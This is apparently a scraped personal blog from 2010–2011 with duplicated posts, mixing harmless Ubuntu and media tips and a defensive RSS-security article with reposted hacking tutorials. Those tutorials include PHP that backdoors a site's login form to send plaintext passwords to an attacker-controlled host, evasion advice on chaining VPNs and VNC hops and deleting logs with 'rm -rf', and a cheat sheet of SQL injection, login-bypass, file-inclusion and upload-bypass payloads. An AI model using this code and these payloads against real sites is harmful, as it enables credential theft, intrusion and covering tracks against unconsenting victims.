Commands For Package Management: These commands require root privilege so either escalate privilege to root by sudo su command or precede each commands with sudo.
apt-get install package1 package2 .. packageN: Download and install the package(s) specified.
apt-get install -d package: Just download the packages(no installation)
apt-get update: Update packages information.
apt-get dist-upgrade: Perform distro version upgrade.
do-release-upgrade: Perform distro version upgrade.
apt-get remove package: Remove the specified package(s).
apt-get -f install: Fix packages problem.
dpkg --configure -a: Fix broken packages.
Other/Misc. Commands
id: Displays user and group IDs for current user.
uname -a: Displays all kernel information
gedit: Open text editor
nautilus: Open nautilus file manager
gksudo nautilus: Open root nautilus file manager
lsb_release -a: Get information about installed ubuntu version
These are some of the commands that has come in my mind as of now. I might update this list when some other commands come into my mind. By the way, TAB is very useful in terminal as it allows auto-completion and suggestion of commands and files in ubuntu. What this means is if you type do- and then press TAB, it will auto complete the command to do-release-upgrade thus saving some important time. Also be sure to share the useful commands in the comment section below.
Read more...
Bookmark this post: |
|
Sunday, 9 October 2011
Rip Audio CDs With Windows Media Player
You need not download any other Audio CD ripping software in windows to rip your Audio CD as Audio CD ripping can be easily done with windows media player. I was thinking I might need to download ripping tools but I just guessed WMP might also have such feature and yeah it had easy way to do so. I'm here to help those non-techie people out there rip the audio CD.
First insert your Audio CD and play it with windows media player. There's a ripping option directly available in the interface. The screenshot provided below will help you to adjust your ripping settings. You might want to adjust the rip settings from the interface itself. Then select the tracks that you want to rip and click on the Rip CD button. Ripping will take few minutes and then output folder will open.
Read more...
First insert your Audio CD and play it with windows media player. There's a ripping option directly available in the interface. The screenshot provided below will help you to adjust your ripping settings. You might want to adjust the rip settings from the interface itself. Then select the tracks that you want to rip and click on the Rip CD button. Ripping will take few minutes and then output folder will open.
Read more...
Bookmark this post: |
|
Monday, 26 September 2011
RSS and Related Security Issues For Business People
While RSS is a very simple way to expand your business and nothing complex is involved in RSS feed systems, you should never underestimate the security issues in any digitized systems, not even in really simple technology like RSS. A business company should always be aware of possible security risks in any system they are employing to help them in their tasks.
Most of you might believe there would not be much security issues in RSS feeds and feel that you need not worry about any cases of exploiting of your system but that's just a myth. Malicious attackers can inject scripts inside the feeds and affect thousands of feed readers with even a single vulnerability discovered in the popular RSS reader or aggregators.
Bad HTML or javascript can be injected as malware inside the feeds and if your business is gathering content from other sources and adding them to feeds, your feeds are likely to be affected by such malwares. Such scripts are generally injected in the feed titles, descriptions, links and other components of the RSS feeds. The scripts injected can exploit the possible vulnerabilities in the RSS readers of your subscribers leading to possible control of your subscriber's PC by the attacker. This can open possible backdoors by the installation of trojans or keyloggers using the proper exploits such as browser exploits, activex exploits, etc. and let the attacker steal the data by using possible local zone security attacks which can be the worst thing you can imagine happening to your business as customers are the life blood of every business and you engage customers everywhere. And if your customers are affected, then ultimately your business will be affected. Hence extreme care should be taken while importing content from other sources to develop your RSS contents.
Many times business owners like to include the comments from subscribers in the RSS contents and mostly they hardly watch the actual content in those comments. There is always a possibility of injection of malicious scripts in those comments as well. So proper filtering and stripping mechanism has to be employed before storing new contents to your RSS feeds rather than just storing those comments in the feed contents. The HTML tags such as script, embed, object, etc. are the ones that must be stripped out in most cases to avoid possible security issues. Also, using safe and secure RSS reader or aggregator is a good approach to RSS security. So you should choose the most secure RSS reader or aggregator from the available ones and suggest those to your subscribers. Also, make sure that your customers and employees use the latest and patched version of the reader so that maximum level of security is ensured.
In many cases, the RSS generators and other services in the RSS servers are also prone to security attacks and the attackers might be able to gain certain level of privilege in the system. In such case, the attackers can replace the original RSS feeds with their own affected version of RSS feeds which will then be delivered to your customers affecting your customers and your business as well. This can be devastating as this might lead not only to the script injections in the feeds but also stealing of many sensitive information from the server. For example, if your RSS server is used to host your business website or maybe for file sharing, the critical data related to them might be compromised as well. So proper security assessment of the server and network from the security professionals is necessary before taking your system live for production usage.
As a business owner, you must understand that security is a necessity in any system, be it a physical system or be it a digitized and online system and RSS is not an exception to this. If you want to succeed as a business owner, you should never underestimate the need of security and privacy and you should employ proper level of security as discussed above in the RSS system. Security in RSS system will ensure gaining of customers and expansion and promotion of your business so do not miss security practices in your RSS feed contents.
Read more...
Most of you might believe there would not be much security issues in RSS feeds and feel that you need not worry about any cases of exploiting of your system but that's just a myth. Malicious attackers can inject scripts inside the feeds and affect thousands of feed readers with even a single vulnerability discovered in the popular RSS reader or aggregators.
Bad HTML or javascript can be injected as malware inside the feeds and if your business is gathering content from other sources and adding them to feeds, your feeds are likely to be affected by such malwares. Such scripts are generally injected in the feed titles, descriptions, links and other components of the RSS feeds. The scripts injected can exploit the possible vulnerabilities in the RSS readers of your subscribers leading to possible control of your subscriber's PC by the attacker. This can open possible backdoors by the installation of trojans or keyloggers using the proper exploits such as browser exploits, activex exploits, etc. and let the attacker steal the data by using possible local zone security attacks which can be the worst thing you can imagine happening to your business as customers are the life blood of every business and you engage customers everywhere. And if your customers are affected, then ultimately your business will be affected. Hence extreme care should be taken while importing content from other sources to develop your RSS contents.
Many times business owners like to include the comments from subscribers in the RSS contents and mostly they hardly watch the actual content in those comments. There is always a possibility of injection of malicious scripts in those comments as well. So proper filtering and stripping mechanism has to be employed before storing new contents to your RSS feeds rather than just storing those comments in the feed contents. The HTML tags such as script, embed, object, etc. are the ones that must be stripped out in most cases to avoid possible security issues. Also, using safe and secure RSS reader or aggregator is a good approach to RSS security. So you should choose the most secure RSS reader or aggregator from the available ones and suggest those to your subscribers. Also, make sure that your customers and employees use the latest and patched version of the reader so that maximum level of security is ensured.
In many cases, the RSS generators and other services in the RSS servers are also prone to security attacks and the attackers might be able to gain certain level of privilege in the system. In such case, the attackers can replace the original RSS feeds with their own affected version of RSS feeds which will then be delivered to your customers affecting your customers and your business as well. This can be devastating as this might lead not only to the script injections in the feeds but also stealing of many sensitive information from the server. For example, if your RSS server is used to host your business website or maybe for file sharing, the critical data related to them might be compromised as well. So proper security assessment of the server and network from the security professionals is necessary before taking your system live for production usage.
As a business owner, you must understand that security is a necessity in any system, be it a physical system or be it a digitized and online system and RSS is not an exception to this. If you want to succeed as a business owner, you should never underestimate the need of security and privacy and you should employ proper level of security as discussed above in the RSS system. Security in RSS system will ensure gaining of customers and expansion and promotion of your business so do not miss security practices in your RSS feed contents.
Read more...
Bookmark this post: |
|
Thursday, 21 April 2011
Practise, Learn and Master Web Application Hacking With DVWA
DVWA, which stands for Damn Vulnerable Web Application, is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
The DVWA v. 1.07 can be downloaded from HERE.
You will need to install Apache+PHP+MySQL environment(use LAMPP or XAMPP packages) to run and test this web application. This will definitely help you learn to spot web vulnerabilities of the varied levels. I hope this was useful. :)
Read more...
The DVWA v. 1.07 can be downloaded from HERE.
You will need to install Apache+PHP+MySQL environment(use LAMPP or XAMPP packages) to run and test this web application. This will definitely help you learn to spot web vulnerabilities of the varied levels. I hope this was useful. :)
Read more...
Bookmark this post: |
|
Thursday, 7 April 2011
How to steal password from login form
This article is written by neutralised of thesoftwareengineer.org but the domain has already expired so I thought to put this article here so that this small piece of information for beginner web hackers won't die.
-------------------------------------------------
[+] Login Form Password Stealing - Tutorial
[+] Author: Neutralise
[+] Location: http://thesoftwareengineer.org/services/tuts/LoginFormPassStealing.txt
--------------------------------------------------
Intro:
It seems that alot of people these days are gaining shell access, downloading a database then attempting to crack the hashes. If they are salted, sha1 or a hard to crack plain ole' MD5, they start bitchin and moaning when they can't get the plain text. So here it is, a tutorial on how to get user:pass format in plain text of ANY hash type.
Method:
Modify the login form of a site to catch the password remotely, before it is encrypted. I will explain this more simply via an example.
Take the following login form for example,
Now we can see that the action of this form points to 'cookies.php'. Now cookies.php will probably include a function similar to this depending on the encryption type, etc.
Now on to bypassing the encryption before it happens, thus gaining the username and password in plain text we need to edit the 'cookie.php' site, add the following code at the start of the php tags.
Now the php file 'plain.php' will include the following code:
Notice you will also need to upload a file 'lol.txt', and chmod it to 777.
Conclusion:
Now every time a user logs into the site you are editing the code of, it will send the username and password to the 'plain.php' text file and save it in 'log.txt', on a remoteserver in the format of:
user:pass
------------------------------
[+]^Neutralised.
------------------------------
-------------------------------------------------
[+] Login Form Password Stealing - Tutorial
[+] Author: Neutralise
[+] Location: http://thesoftwareengineer.org/services/tuts/LoginFormPassStealing.txt
--------------------------------------------------
Intro:
It seems that alot of people these days are gaining shell access, downloading a database then attempting to crack the hashes. If they are salted, sha1 or a hard to crack plain ole' MD5, they start bitchin and moaning when they can't get the plain text. So here it is, a tutorial on how to get user:pass format in plain text of ANY hash type.
Method:
Modify the login form of a site to catch the password remotely, before it is encrypted. I will explain this more simply via an example.
Take the following login form for example,
<form method="post" action="cookies.php"> <hr /> <p> User: <input type="text" class="buttonstyle" name="username"></p> <p> Pass: <input type="password" class="buttonstyle" name="password"></p> <p> <input type="submit" value="Login" class="buttonstyle" name="submit"> <input type="reset" value="Reset" class="buttonstyle" /></p> </form>
Now we can see that the action of this form points to 'cookies.php'. Now cookies.php will probably include a function similar to this depending on the encryption type, etc.
<?php
$user = $_POST['username'];
$pass = $_POST['password'];
if(md5($user) == $usermd5 && md5($pass) == $passmd5){
setcookie("Whatever", $cookie, time()+3600, "/");
header("Location: index.php");
die();
}
?>
Now on to bypassing the encryption before it happens, thus gaining the username and password in plain text we need to edit the 'cookie.php' site, add the following code at the start of the php tags.
<?php
$user = $_POST['username'];
$pass = $_POST['password'];
file_get_contents("http://site.com/plain.php?user=".$user."&pass=".$pass."");
?>>
Now the php file 'plain.php' will include the following code:
<?php $user = $_GET['user']; $pass = $_GET['pass']; $file = "lol.txt"; $fp = fopen($file, "a"); fputs($fp, "$user:$pass\n"); fclose($fp); ?>>
Notice you will also need to upload a file 'lol.txt', and chmod it to 777.
Conclusion:
Now every time a user logs into the site you are editing the code of, it will send the username and password to the 'plain.php' text file and save it in 'log.txt', on a remoteserver in the format of:
user:pass
------------------------------
[+]^Neutralised.
------------------------------
Read more...
Bookmark this post: |
|
Saturday, 19 February 2011
Art of hacking 2 - spyd3rm4n's guide to hacking
Earlier I posted the spyd3rm4n's guide to hacking part 1 over HERE. This is the 2nd part of the guide. Enjoy the guide.
Part II
[0x01] Common_Knowledge
[0x02] How
Sub Common_Knowledge{
It is customary that a hacker know how to hack, but it is mandatory that a hacker know how to hide his/her ass.
You DO NOT want to get caught because:
A) I'm sure you don't want to pay that hefty fine.
B) I'm positive you don't want a criminal record.
C) You probably don't want to be put on probation.
D) You put everybody you have contacted on the internet within your past at risk of being caught.
E) You WILL be frowned upon as a terrible hacker. Everyone knows, you're dumb as shit if you get caught.
F) If you find any reasons why getting caught would be a good idea, please consider the following:
Go to the local gunshop.
Purchase a powerful weapon (remember, you don't want to screw this up.)
Purchase a small magazine.
Go home, place the clip into the weapon, take off the saftey and look into the barrel of the gun and email me back
the color that flashes inside the barrel when the trigger is pulled.
}
Sub How{
What are some ways you can hide your ass? Well, good question, but there are many answers.
I have to say, that the most common way for a person to hide their e-dentity is via a proxy.
Now, one problem with the proxies, is that anyone with common sense can find out your real IP. This is the start of Forensics.
The easiest way for a person to find your IP is the find the provider of the proxy, most like CDN (CoDeeN), seeing that they are
the largest proxy releasing company on the inet. Once they contact CoDeeN (who keep records of all IP's logged into their proxy
at all times), they can find your IP and with a simple whois, can come up with the location of you or your ISP. After that, it's just
a long talk between you and your ISP to find out your information. That's if there has been illegal activity and/or you caused some
pretty hefty damage. ISP's can't release a persons information without a court order as that is an invasion of privacy. But there are
some loop holes in this system. I'm sure you have all read your ISP's fine print and Terms of Service correct? Well, it will most likely
contain something stating that hacking is illegal and that if caught, they can and will report you to the authorities etc.
Another reason is because of the easy PHP function, $_SERVER['HTTP_X_FORWARDED_FOR'] which can be used to grab your real
IP and/or block your attempt at viewing the site.
Another way of hiding your ass, which I suggest as a first part, because it is the easiest, is find a VPN. VPN stands for Virtual Private
Network. Large companies/businesses have these VPN's for their employees to operate on a local network (LAN) over WAN (Wide
Area Network). They will mask your IP with the IP that the VPN is setup on. I.E. My IP is 66.77.88.102 and the VPN IP is 24.12.21.64,
when I log into the VPN, my IP will become 24.12.21.64. This covers your IP over every protocol, it whoops Socks 4 and Socks 5 proxies
rearends. The one thing you have to worry about with a VPN, is that they too, if setup correctly, can log every IP that has used the VPN
at anytime of the day.
Now that the 2 most common ways of hiding your ip have been discussed. Let's not rule out some of the other ways. One being VNC tunneling.
This is the process of logging in to a remote administrative tool repeatedly on other servers.
Example:
Server 1 IP: 1.2.3.4
Server 2 IP: 1.2.3.5
Server 3 IP: 1.2.3.6
All servers have VNC running. I will then log into the VNC for Server 1, then I will use Server 1's VNC to log into Server 2, and repeat the process until
I am logged in on Server 3. This will hide my IP 3 times and make tracing it back even harder. But, once again, you've guessed it. It records everything.
Well, Since I'm getting pretty desperate here, why don't I go balls out?
I will hop on a VPN, then I will VNC tunnel into about 2 or 3 Servers, while logging into a VPN on each of those, then, finally, when I'm tunneled into
Server 3, I will put a VPN on, log into a Socks 4 proxy, put on a anonymous proxy, if I have to, even goto a well known web proxifying site that runs
a CGI or PHP built proxy to view the content needed. Now, picture yourself as that person who has to find your real IP. Yeah, it's gonna be a blast.
The only bad part about this is the fact that the more you log into, the slower and slower it will get. Best done on a high-speed line.
Finally, since this is a mini-book on hiding your ass, I might as well tell you that everything of anything on the internet is logged. Don't forget to clear them.
Example: SSH-
don't forget to rm -rf /var/logs*
}
- Credits : Kr3w of TheDefaced.
Part II
[0x01] Common_Knowledge
[0x02] How
Sub Common_Knowledge{
It is customary that a hacker know how to hack, but it is mandatory that a hacker know how to hide his/her ass.
You DO NOT want to get caught because:
A) I'm sure you don't want to pay that hefty fine.
B) I'm positive you don't want a criminal record.
C) You probably don't want to be put on probation.
D) You put everybody you have contacted on the internet within your past at risk of being caught.
E) You WILL be frowned upon as a terrible hacker. Everyone knows, you're dumb as shit if you get caught.
F) If you find any reasons why getting caught would be a good idea, please consider the following:
Go to the local gunshop.
Purchase a powerful weapon (remember, you don't want to screw this up.)
Purchase a small magazine.
Go home, place the clip into the weapon, take off the saftey and look into the barrel of the gun and email me back
the color that flashes inside the barrel when the trigger is pulled.
}
Sub How{
What are some ways you can hide your ass? Well, good question, but there are many answers.
I have to say, that the most common way for a person to hide their e-dentity is via a proxy.
Now, one problem with the proxies, is that anyone with common sense can find out your real IP. This is the start of Forensics.
The easiest way for a person to find your IP is the find the provider of the proxy, most like CDN (CoDeeN), seeing that they are
the largest proxy releasing company on the inet. Once they contact CoDeeN (who keep records of all IP's logged into their proxy
at all times), they can find your IP and with a simple whois, can come up with the location of you or your ISP. After that, it's just
a long talk between you and your ISP to find out your information. That's if there has been illegal activity and/or you caused some
pretty hefty damage. ISP's can't release a persons information without a court order as that is an invasion of privacy. But there are
some loop holes in this system. I'm sure you have all read your ISP's fine print and Terms of Service correct? Well, it will most likely
contain something stating that hacking is illegal and that if caught, they can and will report you to the authorities etc.
Another reason is because of the easy PHP function, $_SERVER['HTTP_X_FORWARDED_FOR'] which can be used to grab your real
IP and/or block your attempt at viewing the site.
Another way of hiding your ass, which I suggest as a first part, because it is the easiest, is find a VPN. VPN stands for Virtual Private
Network. Large companies/businesses have these VPN's for their employees to operate on a local network (LAN) over WAN (Wide
Area Network). They will mask your IP with the IP that the VPN is setup on. I.E. My IP is 66.77.88.102 and the VPN IP is 24.12.21.64,
when I log into the VPN, my IP will become 24.12.21.64. This covers your IP over every protocol, it whoops Socks 4 and Socks 5 proxies
rearends. The one thing you have to worry about with a VPN, is that they too, if setup correctly, can log every IP that has used the VPN
at anytime of the day.
Now that the 2 most common ways of hiding your ip have been discussed. Let's not rule out some of the other ways. One being VNC tunneling.
This is the process of logging in to a remote administrative tool repeatedly on other servers.
Example:
Server 1 IP: 1.2.3.4
Server 2 IP: 1.2.3.5
Server 3 IP: 1.2.3.6
All servers have VNC running. I will then log into the VNC for Server 1, then I will use Server 1's VNC to log into Server 2, and repeat the process until
I am logged in on Server 3. This will hide my IP 3 times and make tracing it back even harder. But, once again, you've guessed it. It records everything.
Well, Since I'm getting pretty desperate here, why don't I go balls out?
I will hop on a VPN, then I will VNC tunnel into about 2 or 3 Servers, while logging into a VPN on each of those, then, finally, when I'm tunneled into
Server 3, I will put a VPN on, log into a Socks 4 proxy, put on a anonymous proxy, if I have to, even goto a well known web proxifying site that runs
a CGI or PHP built proxy to view the content needed. Now, picture yourself as that person who has to find your real IP. Yeah, it's gonna be a blast.
The only bad part about this is the fact that the more you log into, the slower and slower it will get. Best done on a high-speed line.
Finally, since this is a mini-book on hiding your ass, I might as well tell you that everything of anything on the internet is logged. Don't forget to clear them.
Example: SSH-
don't forget to rm -rf /var/logs*
}
- Credits : Kr3w of TheDefaced.
Read more...
Bookmark this post: |
|
Friday, 18 February 2011
Art of hacking 1 - spyd3rm4n's guide to hacking
This series of articles can be very useful for many beginners out there but after the thedefaced and darkmindz went down, I haven't really seen these articles anywhere else. So I thought to share this article over here. Its NOT written by me and I would like to provide the full credit to the original author as well.
Art of hacking [ 1 ]
spyd3rm4n's guide to hacking
Part I
[0x01] Definition
[0x02] Method
[0x03] Side_Notes
[0x04] Credits
Sub Definition{
a : to write computer programs for enjoyment
b : to gain access to a computer illegally
}
Sub Method{
These are the boundaries that differentiate a hacker, from a cracker. A cracker will use the same methods of a hacker, but instead of leaving it at just that, they will take it one step beyond, and use the information gained to extort another person and/or cause damage.
Now that has been cleared up, I will just inform you of one of my most common method of hacking.
When I hack, it is a golden rule that I must know what I am hacking. If it's a website, I must know what language is it written in. If I do not, I will learn the language, or at least be able to read it and pick out human errors in the programming.
I usually start like this:
I will first search the website for vulnerable user-input fields. Something that interacts with the viewer. It should include fields that are POST and GET. I will test these fields for penetration. The most common fields vulnerable, are search forms. These can be vulnerable to almost any type of injection, HTML, JAVASCRIPT, or SQL. To test if a field is injectable with HTML, I will usually type "<h1>hello</h1>." If the page returns the word hello in big bold letters, I know it's vulnerable. I then will step it up to JAVASCRIPT. I will type "<script>alert(1)</script>", <script language="Javascript">alert(1)</script>m etc.." If the returned page contains an alert message printing the number 1, I know I can cross-site script it (XSS). SQL on the other hand has a number of pen-testing syntaxes. I usually type a single quote, if it returns SQL errors, I know its vulnerable to injection. If it doesn't, I will sometimes try different combinations of SQL attacks. I will try most commonly, and my favorite, a union injection. Syntax: '+union+select+1--
If that returns with any sort of SQL error, I then know I hit the jackpot. The most common error with union selections is "The UNION SELECT statement is missing the correct number of columns" or something of that sort. It means that you have to select more than one column. This can be the longest part of injecting. You then have to '+union+select+1,2-- each time, adding on another number separated by a comma until your UNION SELECT statement has no errors, and returns a value from that field. I will then look for the returned page for a number. If for example, lets say I did '+union+select+1,2,3,4,5,6--
and the page returns a series of pictures, and in the blue, there is just the number 6 on that page, I will then do '+union+select+1,2,3,4,5,table_name+from+information_schema.tables--
This will select the table name from the information schema, if its allowed. That's all I'm going to say about that for now. If you want to know more, you can learn up on your SQL.
Next, if I find the site is pretty secure, it is always important not to rule out other methods of intrusion. My 2nd and favorite method, is the capturing of the host. With a simple WHOIS lookup, I can find the host of their site. Now, if I pen-test their host and find a vulnerability, that is just as good as hacking their site because it allows for a way in. If all else fails, you can do a reverse IP lookup on the domain of the website. Take a look at all the other websites on that IP and pen-test their security. If you can get rights to upload on one of their sites, you can upload a PHP-Shell and work your way into their directory, viewing their files. If you want to take it further, you can go ahead and try to root the server. Rooting is pretty easy if you know what you're looking for/know any stack/buffer overflows for the OS. Most servers run linux, so it's best to look for overflows for that specific kernel version that contain "Local Root" in it. Other than that, there are so many ways of obtaining root. These include but are not limited to key-logging, phishing, and social engineering. That's pretty much the basis of one of my most common methods of hacking. If you would like to know more, well.. I'm sorry, but you're going to have to pick up the knowledge as you continue your career hacking.
}
Sub Side_Notes{
If you want to learn more, you can check out the mini-books on Hide My Ass, XSS Injection, SQL Injection, Navigating towards root in a PHP Shell, and Stack Overflows in a nuttshell.
}
Sub Credits{
I'm sure you're all wondering who I am going to credit in this. The thing is that over the years, I have encountered many talented hackers. Too many to name in fact. But, there is one person I have to give credit to for being probably one of the most talented hackers I have "read" from. This person is unknown, and I'm sure many of you have read some of their docs. This person is the author of the ZFO (Zero For Owned) series. If you haven't read them, I highly suggest you do a google dork for Zeroforowned. Not to sure on how many of them are still public/around. (You'll notice the style of documentation similarity that I have put in this document, with the ZFO).
}
- Credits : Kr3w of TheDefaced
Art of hacking [ 1 ]
spyd3rm4n's guide to hacking
Part I
[0x01] Definition
[0x02] Method
[0x03] Side_Notes
[0x04] Credits
Sub Definition{
a : to write computer programs for enjoyment
b : to gain access to a computer illegally
}
Sub Method{
These are the boundaries that differentiate a hacker, from a cracker. A cracker will use the same methods of a hacker, but instead of leaving it at just that, they will take it one step beyond, and use the information gained to extort another person and/or cause damage.
Now that has been cleared up, I will just inform you of one of my most common method of hacking.
When I hack, it is a golden rule that I must know what I am hacking. If it's a website, I must know what language is it written in. If I do not, I will learn the language, or at least be able to read it and pick out human errors in the programming.
I usually start like this:
I will first search the website for vulnerable user-input fields. Something that interacts with the viewer. It should include fields that are POST and GET. I will test these fields for penetration. The most common fields vulnerable, are search forms. These can be vulnerable to almost any type of injection, HTML, JAVASCRIPT, or SQL. To test if a field is injectable with HTML, I will usually type "<h1>hello</h1>." If the page returns the word hello in big bold letters, I know it's vulnerable. I then will step it up to JAVASCRIPT. I will type "<script>alert(1)</script>", <script language="Javascript">alert(1)</script>m etc.." If the returned page contains an alert message printing the number 1, I know I can cross-site script it (XSS). SQL on the other hand has a number of pen-testing syntaxes. I usually type a single quote, if it returns SQL errors, I know its vulnerable to injection. If it doesn't, I will sometimes try different combinations of SQL attacks. I will try most commonly, and my favorite, a union injection. Syntax: '+union+select+1--
If that returns with any sort of SQL error, I then know I hit the jackpot. The most common error with union selections is "The UNION SELECT statement is missing the correct number of columns" or something of that sort. It means that you have to select more than one column. This can be the longest part of injecting. You then have to '+union+select+1,2-- each time, adding on another number separated by a comma until your UNION SELECT statement has no errors, and returns a value from that field. I will then look for the returned page for a number. If for example, lets say I did '+union+select+1,2,3,4,5,6--
and the page returns a series of pictures, and in the blue, there is just the number 6 on that page, I will then do '+union+select+1,2,3,4,5,table_name+from+information_schema.tables--
This will select the table name from the information schema, if its allowed. That's all I'm going to say about that for now. If you want to know more, you can learn up on your SQL.
Next, if I find the site is pretty secure, it is always important not to rule out other methods of intrusion. My 2nd and favorite method, is the capturing of the host. With a simple WHOIS lookup, I can find the host of their site. Now, if I pen-test their host and find a vulnerability, that is just as good as hacking their site because it allows for a way in. If all else fails, you can do a reverse IP lookup on the domain of the website. Take a look at all the other websites on that IP and pen-test their security. If you can get rights to upload on one of their sites, you can upload a PHP-Shell and work your way into their directory, viewing their files. If you want to take it further, you can go ahead and try to root the server. Rooting is pretty easy if you know what you're looking for/know any stack/buffer overflows for the OS. Most servers run linux, so it's best to look for overflows for that specific kernel version that contain "Local Root" in it. Other than that, there are so many ways of obtaining root. These include but are not limited to key-logging, phishing, and social engineering. That's pretty much the basis of one of my most common methods of hacking. If you would like to know more, well.. I'm sorry, but you're going to have to pick up the knowledge as you continue your career hacking.
}
Sub Side_Notes{
If you want to learn more, you can check out the mini-books on Hide My Ass, XSS Injection, SQL Injection, Navigating towards root in a PHP Shell, and Stack Overflows in a nuttshell.
}
Sub Credits{
I'm sure you're all wondering who I am going to credit in this. The thing is that over the years, I have encountered many talented hackers. Too many to name in fact. But, there is one person I have to give credit to for being probably one of the most talented hackers I have "read" from. This person is unknown, and I'm sure many of you have read some of their docs. This person is the author of the ZFO (Zero For Owned) series. If you haven't read them, I highly suggest you do a google dork for Zeroforowned. Not to sure on how many of them are still public/around. (You'll notice the style of documentation similarity that I have put in this document, with the ZFO).
}
- Credits : Kr3w of TheDefaced
Read more...
Bookmark this post: |
|
Sunday, 26 December 2010
Web Hacking for Beginners and Intermediates
This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.
Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.
This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.
SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version
Current SQL User: SELECT user()
SELECT system_user()
Current Database: SELECT database()
MySQL Data directory(location of MySQL data files): SELECT @@datadir
List all MySQL users: SELECT host, user, password FROM mysql.user
Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char
Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.
Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.
Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)
unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--
Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091
XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>
Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.
' /*or*/ 1='1 –Bypasses or filter
File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php
including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd
path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd
Nullbyte injection
test.php?page=../../../../../etc/passwd
Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/
PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php
Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:
Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.
Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.
File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.
PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.
Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.
Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.
As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.
Read more...
Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.
This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.
SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version
Current SQL User: SELECT user()
SELECT system_user()
Current Database: SELECT database()
MySQL Data directory(location of MySQL data files): SELECT @@datadir
List all MySQL users: SELECT host, user, password FROM mysql.user
Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char
Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.
Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.
Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)
unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--
Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091
XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>
Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.
' /*or*/ 1='1 –Bypasses or filter
File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php
including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd
path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd
Nullbyte injection
test.php?page=../../../../../etc/passwd
